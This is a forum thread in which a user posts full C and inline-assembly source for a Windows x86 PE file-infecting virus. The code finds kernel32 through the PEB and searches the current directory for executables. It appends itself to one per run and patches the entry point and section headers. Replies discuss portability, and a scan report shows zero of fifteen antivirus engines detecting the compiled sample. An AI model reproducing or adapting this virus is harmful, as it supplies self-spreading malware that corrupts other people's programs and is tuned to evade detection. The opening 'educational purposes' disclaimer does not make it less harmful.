
X86 PE Parasite


JMC31337


//./gcc -masm=intel -mwindows -m32 -o file.exe xfile.c
//Run the virus under a debugger (the jmp orig EP only works
//after first infection is completed  - afterwards all files
//will infect and run as normal
//it will infect 1 exe file per run in current dir 
//x86 PE Parasite
//WARNING!
//For educational purposes and virology analysis ONLY!
//The author is not responsible for any damage caused
//by this code
//NOTE: I took some cheap tactics and tricks to get this
//to work and its some real convoluted coding
 
//============virt mem array=========
//virtallocAPI*   [ebp+0x00] (win7)
//findfirstfileAPI [ebp+0x04]
//findnextfileAPI  [ebp+0x08]
//CreateFileAPI    [ebp+0x0c]
//ReadFileAPI   [ebp+0x10]
//CloseHandleAPI   [ebp+0x14]
//WriteFileAPI   [ebp+0x18]
//fileEP        [ebp+0x1c] PE+0x28
//fileSecNos    [ebp+0x20] PE+0x06
//fileImgSize+4000h    [ebp+0x24] PE+0x50
//fileImgBase   [ebp+0x28]  PE+34
//fileSecVS+4000h    [ebp+0x2c]   PE+F8+((0x28*[secnos])-20h)
//fileSecRS+4000h    [ebp+0x30]   PE+F8+((0x28*[secnos])-18h)
//shellEP     [ebp+0x34]
//hostloadPTR [ebp+0x38]           
//GetProcAPI  [ebp+0x3c]
//LoadLib        [ebp+0x40]
//k32 base       [ebp+0x44]
//fhandle         [ebp+0x48]
//WIN32_FILE_DATA  [ebp+0x4C]
//WIN32 fname [ebp+WIN32_FILE_DATA+0x2c]
//GetFileSizeAPI [ebp+0x100]
//FileSize [ebp+0x104]
//virtHostAddr [ebp+0x108]
//=========================================
 
 
#include <windows.h>
 
void step()
{
asm
(
".intel_syntax noprefix\n"
 
 
//HEURISTICS AV DETECT THIS 
//BASE WALKING
//crypto mem it
 
"_start:\n"
"call _start2\n"
"_start2:\n"
"pop ebx\n"
"sub ebx,0x05\n"
"pushad\n"
"mov [0x7EFDF400],ebx\n" //CHEAP
 
 
//==================================
"mov eax,dword ptr fs:[0x30]\n"
"mov eax,dword ptr ds:[eax+0xC]\n"
"mov eax,dword ptr ds:[eax+0x14]\n"
"mov eax,dword ptr ds:[eax]\n"
"mov eax,dword ptr ds:[eax]\n"
"mov eax,dword ptr ds:[eax+0x10]\n"
//===================================
 
 
"mov ebx,eax\n"  //eax ebx = k32 base
"mov eax,[eax+0x3c]\n"  
"add eax,ebx\n"   //eax=PE
"cmp word ptr[eax+0x04],0x014C\n" //0x8664 for x64...0x14c for x86
"jne _end\n"
"sub eax,ebx\n"
"mov eax,[eax+0x78+ebx]\n"
"add eax,ebx\n"
"mov edx,eax\n"  //edx=imgVA
 
 
"mov ecx,[edx+0x18]\n"
"mov eax,[edx+0x20]\n"
"add eax,ebx\n"
 
 
"_find:\n"
"dec ecx\n"
"mov edi,[eax+ecx*0x04]\n"
"add edi,ebx\n"
"cmp dword ptr [edi],0x50746547\n"
"jnz   _find\n"
"cmp   dword ptr [edi + 0x04],0x41636f72\n" //Acor
"jnz   _find\n"
"cmp   dword ptr [edi + 0x08],0x65726464\n" //erdd
"jnz   _find\n"
"cmp   word  ptr [edi + 0x0C],0x7373\n" //ss
"jnz   _find\n"
 
"mov eax,[edx+0x24]\n"
"add eax,ebx\n"
"mov cx,[eax+ecx*0x02]\n"
"mov eax,[edx+0x1c]\n"
"add eax,ebx\n"
"mov eax,[eax+ecx*0x04]\n"
"add eax,ebx\n"
"mov edi,eax\n" //edi eax = GetProcAPI
 
 
 
"push 0x00\n"        //00000000  ....
"push 0x41797261\n"   //41797261  aryA
"push 0x7262694C\n"  //7262694C  Libr
"push 0x64616F4C\n"  //64616F4C  Load
"push esp\n"         //esp = loadlibraryA on stack
"push ebx\n"        //push the k32 base address
 
"call edi\n"
"add esp,0x10\n"  //clean stack garbage up
"mov edx,eax\n" //edx=LoadLibraryA API edi=GetProcAddr
 
"push edx\n"
 
//set virt mem location RWE
 
"push 0x00\n"
"push 0x636f6c6c\n"
"push 0x416c6175\n"
"push 0x74726956\n"
"push esp\n"
"push ebx\n"
"call edi\n" //eax=VirtualAllocAPI
"add esp,0x10\n"  //clean stack garbage up
 
 
"push 0x40\n"
"push 0x1000\n"
"push 0x1000\n"
"push 0\n"
"call eax\n" //eax=Virtrual RWE mem array 
 
"mov ebp,eax\n" //set the ebp pointer to virt mem
 
"mov ecx,edi\n"
"add ecx,0x600\n"  //win7 virt alloc is -600 getproc
"mov [ebp],ecx\n"
"mov [ebp+0x3c],edi\n"
"mov [ebp+0x44],ebx\n"
"pop edx\n"
"mov [ebp+0x40],edx\n"
//edi=getproc
 
 
//FindFirstFileA
//46 69 6E 64 46 69 72 73 74 46 69 6C 65 41 00
"push 0x004165\n"
"push 0x6c694674\n"
"push 0x73726946\n"
"push 0x646e6946\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x04],eax\n"
"add esp,0x10\n"
 
//FindNextFileA
//46 69 6E 64 4E 65 78 74 46 69 6C 65 41 00 
"push 0x0041\n"
"push 0x656c6946\n"
"push 0x7478654e\n"
"push 0x646e6946\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x08],eax\n"
"add esp,0x10\n"
 
 
//CreateFileA
//43 72 65 61 74 65 46 69 6C 65  41 00
"push 0x0041656c\n"
"push 0x69466574\n"
"push 0x61657243\n" 
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x0c],eax\n"
"add esp,0x0c\n"
 
 
//ReadFile
//52 65 61 64 46 69 6C 65 00
"push 0x00\n"
"push 0x656c6946\n"
"push 0x64616552\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x10],eax\n"
"add esp,0x0c\n"
 
 
//CloseHandle
//43 6C 6F 73 65 48 61 6E 64 6C 65 00 
"push 0x00656c64\n"
"push 0x6e614865\n"
"push 0x736f6c43\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x14],eax\n"
"add esp,0x0c\n"
 
 
//WriteFile
//57 72 69 74 65 46 69 6C 65 00
"push 0x0065\n"
"push 0x6c694665\n"
"push 0x74697257\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov [ebp+0x18],eax\n"
"add esp,0x0c\n"
 
//GetFileSize
//47 65 74 46 69 6C 65 53 69 7A 65
"push 0x00657a69\n"
"push 0x53656c69\n"
"push 0x46746547\n"
"push esp\n"
"push ebx\n"
"call edi\n"
"mov edx,ebp\n"
"add edx,0x100\n"
"mov [edx],eax\n"
"add esp,0x0c\n"
 
 
//setup WIN32_FIND_DATA
"mov edx,ebp\n"
"add edx,0x2c\n"
"add edx,0x4c\n"
"mov dword ptr[edx],0x78652e2a\n"
"mov dword ptr[edx+0x4],0x0065\n"
"mov edx,ebp\n"
"add edx,0x4c\n"
"push edx\n"
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x04]\n"
"call edx\n"                  //FindFirstFile
 
"cmp eax,0x00\n" //eax 0 = no file
"je _end\n"
 
 
"mov [ebp+0x48],eax\n"
 
//open file to see if it has RW privs
"push 0x00\n"
"push 0x80\n"
"push 0x03\n"
"push 0x00\n"
"push 0x00\n"
"push 0xC0000000\n" //read+write
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x0c]\n"
"call edx\n"    //CreateFile
 
 
"cmp eax,0x00\n"
"je _end\n"
"cmp eax,0xFFFFFFFF\n" //ff...=share error
"je _findnext\n"
 
"mov [ebp+0x250],eax\n"
 
 
 
"_findret:\n"
//GetFileSize
//eax=file handle
"push eax\n"
"mov edx,ebp\n"
"add edx,0x104\n"
"push edx\n"
"sub edx,0x04\n"
"push eax\n"
"mov edx,[edx]\n"
"call edx\n"
"mov [ebp+0x104],eax\n"
 
"mov edx,eax\n"
"add edx,0x4000\n" //inc fsize + 4000h
"push 0x40\n"    //PAGE_EXECUTE_READWRITE
"push 0x1000\n"  //MEM_COMMIT
"push edx\n"    //size
"push 0x00\n"   //virt addr
"mov edx,[ebp]\n"
"call edx\n"
"mov [ebp+0x108],eax\n"
 
 
//ReadFile
"mov edx,0x00\n"
"push edx\n"
"mov edx,ebp\n"
"add edx,0x10c\n" //ebp+10c hold the bytes read ret
"push edx\n"
"mov edx,ebp\n"
"add edx,0x104\n"
"mov edx,[edx]\n"
//"add edx,0x4000\n"
"push edx\n"
"mov edx,ebp\n"
"add edx,0x108\n"
"mov edx,[edx]\n"
"push edx\n"
"mov edx,[esp+0x10]\n"
"push edx\n"
"mov edx,[ebp+0x10]\n"
"call edx\n"    //ReadFile (ebp+0x108 = virt file)
"add esp,0x04\n"
 
 
//CloseHandle
"mov edx,[ebp+0x250]\n"
"push edx\n"
"mov edx,[ebp+0x14]\n"
"call edx\n"
 
//DETECT EOF "X" IF HOST IS INFECTED
//CLOSEHANDLE B4 findnext??  
 
"mov edx,[ebp+0x108]\n"
"add edx,[ebp+0x104]\n"
"dec edx\n"
"cmp byte ptr [edx],0x58\n"
"je _findnext\n"
 
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"cmp word ptr [edx+0x04],0x014c\n" //x86 parasite
"jne _findnext\n"
 
 
 
//***************************************8
//place host's EP into 0x7EFDF404 
// and host's PE+ 0xbc
//since we'll overwrite orig EP
//to point to shell
 
"push edx\n"
"mov ecx,edx\n"
"add ecx,0xbc\n"
//"mov ecx,[edx+0xbc]\n"  //host PE not used location
"mov eax,[edx+0x34]\n" //eax=hostBaseAddr
"add edx,0x28\n"
"mov edx,[edx]\n"
"add edx,eax\n"
"mov [ecx],edx\n"
"mov [0x7efdf404],edx\n"
"pop edx\n"
//****************************************8
 
 
"mov ecx,[edx+0x28]\n"
 
//here---------------------------------------------------
"mov ecx,[0x7EFDF404]\n"
"mov [edx+0xbc],ecx\n"
"mov [ebp+0x200],ecx\n"
//-------------------------------------------------------
 
"mov [ebp+0x1c],ecx\n"
"xor ecx,ecx\n"
"mov cx,word ptr[edx+0x06]\n"
"mov [ebp+0x20],ecx\n"
"mov ecx,[edx+0x50]\n"
"mov [ebp+0x24],ecx\n"
"mov ecx,[edx+0x34]\n"
"mov [ebp+0x28],ecx\n"
 
 
"mov ecx,edx\n"
"add ecx,0xf8\n"
"mov eax,[ebp+0x20]\n"
"mov edx,0x28\n"
"mul edx\n"
"add ecx,eax\n"
"sub ecx,0x20\n"
"mov edx,[ecx]\n"
"mov [ebp+0x2c],edx\n"
"add ecx,0x08\n"
"mov edx,[ecx]\n"
"mov [ebp+0x30],edx\n"
 
//edx=PE sec vs
"mov edx,[ebp+0x2c]\n"
"add edx,0x4000\n"
"mov [ebp+0x2c],edx\n"
"mov edx,[ebp+0x30]\n"
"add edx,0x4000\n"
"mov [ebp+0x30],edx\n"
"mov edx,[ebp+0x24]\n"
"add edx,0x4000\n"
"mov [ebp+0x24],edx\n"
 
 
"push 0x006c6c\n"
"push 0x642e3233\n"
"push 0x72657375\n"
"mov edx,[ebp+0x40]\n"
"push esp\n"
"call edx\n"
"add esp,0x0c\n"
 
 
"push 0x0041786f\n"
"push 0x42656761\n"
"push 0x7373654d\n"
"push esp\n"
"push eax\n"
"mov edx,[ebp+0x3c]\n"
"call edx\n"
"add esp,0x08\n"
 
"push 0x00\n"
"push 0x00\n"
"push 0x00\n"
"push 0x00\n"
"call eax\n"
"add esp,0x04\n"
 
 
//DETECT virus -> host
//DETECT infectedHOST -> host
 
 
"_peNFX:\n"
"mov edx,[ebp+0x108]\n"
"add edx,[ebp+0x104]\n"
"mov ecx,0x550\n"
"mov esi,[0x7EFDF400]\n"
//"add esi,[ebp+0x108]\n"
"mov edi,edx\n"
"rep movsb\n"
 
 
 
 
"mov ecx,[ebp+0x108]\n"
"add ecx,[ecx+0x3c]\n"
"add ecx,0xf8\n"
"mov eax,[ebp+0x20]\n"
"mov edx,0x28\n"
"mul edx\n"
"add ecx,eax\n"
"sub ecx,0x20\n"
"push ecx\n"
"mov edx,ebp\n"
"add edx,0x28\n"
"mov edx,[edx]\n"
"add edx,[ebp+0x1c]\n"
"mov ecx,[ebp+0x104]\n"
"add ecx,0x4000\n"
 
 
 
//==================================
//notes:
//*change hostEP
 
"mov edx,[esp]\n"
"mov eax,[edx+0x0c]\n" //eax=RO
"sub ecx,eax\n"
"mov eax,[edx+0x04]\n" //edx=VO
"add ecx,eax\n"
"mov [ebp+0x34],ecx\n"
"mov edx,ebp\n"
"add edx,0x108\n"
"mov edx,[edx]\n"
 
//change VS
"mov edx,[esp]\n"
"mov eax,[ebp+0x2c]\n"
"mov [edx],eax\n"
 
//change RS
"mov edx,[esp]\n"
"add edx,0x08\n"
"mov eax,[ebp+0x30]\n"
"mov [edx],eax\n"
 
//change imgsize
"mov edx,[esp]\n"
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"add edx,0x50\n"
"mov eax,[ebp+0x24]\n"
"mov [edx],eax\n"
 
//add "X" EOF indication
"mov edx,[ebp+0x108]\n"
"add edx,[ebp+0x104]\n"
"add edx,0x4000\n"
"dec edx\n"
"mov byte ptr[edx],0x58\n"
 
 
//reopen file for write
//when using valloc
//we cant access a file 
//for read then write one shot
//its one then the other
 
"push 0x00\n"
"push 0x80\n"
"push 0x03\n"
"push 0x00\n"
"push 0x00\n"
"push 0x40000000\n" //read+write
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x0c]\n"
"call edx\n"    //CreateFile
 
"cmp eax,0x00\n"
"je _end\n"
"cmp eax,0xFFFFFFFF\n" //ff...=share error
"je _findnext\n"
 
"mov [ebp+0x250],eax\n"
 
 
//shell_raw_location - ro + vo + imgbase
//change hostEP
 
"mov eax,[ebp+0x108]\n"
"add eax,[ebp+0x104]\n"
"add eax,0x502\n" //CHEAP
 
"mov edx,fs:[0x30]\n"
"mov edx,[edx+0x08]\n"
"push edx\n"
//"mov edx,[0x010075]\n" //CHEAP
"add edx,[edx+0x3c]\n"
"add edx,0x28\n"
"mov edx,[edx]\n"
"pop ecx\n"
"add edx,ecx\n"
//"mov [eax],edx\n"
"mov [0x7EFDF400],edx\n" 
 
 
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"add edx,0x28\n"
"mov ecx,[ebp+0x104]\n"
//"sub ecx,0x4000\n"
"mov edx,[esp]\n"
"sub ecx,[edx+0x0c]\n"
"add ecx,[edx+0x04]\n"
"mov edx,[ebp+0x108]\n"
"add edx,[edx+0x3c]\n"
"add edx,0x28\n"
"mov [edx],ecx\n"
 
 
 
/*
"mov ecx,[ebp+0x108]\n"
"add ecx,[ecx+0x3c]\n"
"mov edx,[0x7EFDF404]\n"
"add ecx,0xbc\n"
"mov [ecx],edx\n"
*/
 
 
//writefile
"push 0x00\n"
"mov edx,ebp\n"
"add edx,0x10c\n"
"mov dword ptr[edx],0x000000\n"
"push edx\n"
"mov edx,[ebp+0x104]\n"
"add edx,0x4000\n"
"push edx\n"
"mov edx,[ebp+0x108]\n"
"push edx\n"
"mov edx,[ebp+0x250]\n"
"push edx\n"
"mov edx,[ebp+0x18]\n"
"call edx\n"
 
"pop eax\n"
"jmp _end\n"
 
 
"_findnext:\n"
"mov edx,ebp\n"
"add edx,0x4c\n"
"push edx\n"
"mov edx,[ebp+0x48]\n"
"push edx\n"
"mov edx,[ebp+0x08]\n"
"call edx\n"
 
"cmp eax,0x00\n"
"je _end\n"
 
 
"push 0x00\n"
"push 0x80\n"
"push 0x03\n"
"push 0x00\n"
"push 0x00\n"
"push 0xc0000000\n" //read+write
"mov edx,ebp\n"
"add edx,0x78\n"
"push edx\n"
"mov edx,[ebp+0x0c]\n"
"call edx\n"   //CreateFileA
 
 
"cmp eax,0x00\n"
"je _end\n"
"cmp eax,0xFFFFFFFF\n" //ff...=share error
"je _findnext\n"
"mov [ebp+0x250],eax\n"
"jmp _findret\n"
 
 
 
//detect eax=0 and eax=ffffffff
 
"_end:\n"
"popad\n"
"mov edx,fs:[0x30]\n"
"mov edx,[edx+0x08]\n"
"mov ecx,edx\n"
"add ecx,[ecx+0x3c]\n"
"mov edx,[ecx+0xbc]\n"
"jmp edx\n"
"push eax\n"
"push eax\n"
);
 
 
 
 
}//end step fx
 
 
int WINAPI WinMain(HINSTANCE h, HINSTANCE h2, LPSTR lp, int i)
{
 
asm("pop ebp\n");
asm("call _start\n");
MessageBoxA(0,0,0,0);
}

 


CodeExplorer

Look a bit like my private virus!
 


"mov [0x7EFDF400],ebx\n" //CHEAP


"mov [0x7EFDF400],edx\n"

What are those for?
Plus I doubt it will work on any OS different than yours!
 


2 hours ago, CodeExplorer said:

Look a bit like my private virus!
 

What are those for?
Plus I doubt it will work on any OS different than yours!
 

That’s just a location in the PEB that can handle some stored dword data

Tested on Win7; the VirtualAlloc method (add ecx,600) may not work on other versions, but it can be fixed to do so.

take care, on to Linux to write one similar


xfile.exe
Name:	xfile.exe 
Size: 	18.33kB (18,768 bytes) 
Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows 
First seen: 	May 5, 2019 at 11:03:22 PM GMT+2
MD5:	3b722544eb9410e2f7bf42350ff530c0 
SHA1:	1e1edf4df43fafe5a3cfa18646a573142545ad6e 
Status:	Scan finished. 0/15 scanners reported malware.
Scan taken on:	May 5, 2019 at 11:03:23 PM GMT+2
Avast! Antivirus  May 5, 2019 Found nothing   BitDefender Antivirus  May 5, 2019 Found nothing   ClamAV  May 5, 2019 Found nothing Dr. Web  May 5, 2019 Found nothing   MicroWorld eScan  May 5, 2019 Found nothing   ESET  May 5, 2019 Found nothing Fortinet  May 4, 2019 Found nothing   F-PROT Antivirus  May 5, 2019 Found nothing   F-Secure Anti-Virus  May 5, 2019 Found nothing G DATA  May 5, 2019 Found nothing   Ikarus  May 5, 2019 Found nothing   K7 AV  May 5, 2019 Found nothing Sophos  May 5, 2019 Found nothing   Trend Micro Antivirus  May 4, 2019 Found nothing   VBA32  May 4, 2019 Found nothing

--Jotti scanned -- Norton Internet Security heuristics were raised, but only AFTER the infection had already transpired into 1 file; this 1 file was not able to infect any other file.

 

